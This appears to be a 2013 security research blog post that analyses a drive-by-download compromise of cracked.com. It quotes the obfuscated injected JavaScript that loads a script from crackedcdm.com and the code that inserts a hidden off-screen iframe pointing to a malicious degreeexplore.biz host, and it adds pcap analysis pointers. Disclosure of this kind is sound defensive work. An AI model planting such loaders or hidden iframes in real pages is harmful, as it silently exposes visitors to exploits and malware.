On 2013-11-10 one of our research systems discovered that the website cracked.com was hosting a drive-by-download that resulted in malware being installed on vulnerable systems that visited the website. As with the php.net compromise that we posted about a few weeks ago, sites that are very popular serving malware can quickly compromise a large number on users. According to Alexa cracked.com comes in at 650th most popular site in the world, and 289th in the US, meaning thousands of visitors were exposed.
var tyi = “cdm.”; var itwo = “cracked”; var itto = “/”; var phw = “php”; var jfw = “src”; var fscr = “script”; var twi = “i”; var htp = “http”; var vol54 = “src”;document.write(“<“+fscr+” “+jfw+”=”+htp+”:”+itto+””+itto+””+twi+”.”+itwo+””+tyi+”com”+itto+””+twi+”.”+phw+”><“+itto+””+fscr+”>”);
Which sends a request to crackedcdm.com, a domain registered on 2013-11-04, which means we can assume that those responsible for this had the ability to serve their content from cracked.com at least that early.
From there an iframe is inserted pointing to p68ei5.degreeexplore.biz
var urla='http://p68ei5.degreeexplore.biz:53331/51fd0e1afd1243f00bd4f6473a0bfc41.html';var divTag=document.createElement(‘div');divTag.id='ad3′;document.body.appendChild(divTag);var fr3=document.createElement(‘iframe');fr3.width='88px';fr3.height='31px';fr3.setAttribute(‘style','position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;');fr3.setAttribute(‘src',urla);document.getElementById(‘ad3').appendChild(fr3);
As of the time of this post the malware is detected by 7 out of the 46 antivirus engines tested by virustotal.com.
Further details of the behavior of the malware itself can be seen at https://malwr.com/analysis/MGE1MWZmYjY3Y2IxNDM2Y2IwY2JhZDdmMjEzYTQwOTc/
Here is a link to the full pcap (50c691bad0ba43d4370e2be0dd873e83, 4.3M) for your own further analysis/study. It seems that intentionally or otherwise the attackers employed some techniques to make packet analysis a bit more difficult than usual so be prepared to go a bit beyond your standard methodology.
We attempted to contact cracked.com with this information, but unfortunately they provide no security contact information on their website, their email@example.com bounces, and so far they have not responded to messages to their twitter account. So if you know anyone involved in running that site they might appreciate you sharing this post with them.
A few more details about the pcap since we've had some questions.
Frame number 66 is the response from cracked.com (after a redirect). You can see the malicious JS inserted along with their twitter feed, line 1645 if you extract the text response, or search for “paddingLeftFooter twitterLogo” and you'll find it.
The request to /i.php on crackedcdm.com begins in frame 1251.
The exploits and the payload are delivered from p68ei5.degreeexplore.biz in multiple requests begining at 1495, 2565, 2567, 2581, and several others. If you're exploring the easiest way to see this part is to use the ‘http contains “p68ei5.degreeexplore.biz”‘ as your Wireshark filter.
One of the site administrators (David Wong) of cracked.com has posted to their forums that the team fixed the problem Tuesday afternoon. hxxp://www.cracked.com/forums/index.php?topic=144437.msg2757527#msg2757527
It seems as though the site being compromised and serving malware has been a reoccurring problem with cracked.com. Each with somewhat lax approach “Yeah we stopped getting complaints about it and Google took us off the malware warning list or whatever was triggering it. Is anybody else getting it again?” on their forums. This combined with not alerting their site visitors that know what has happened and remediation steps that they can take to cleanup their systems tends to indicate that cracked.com should be avoided if you're concerned with malware.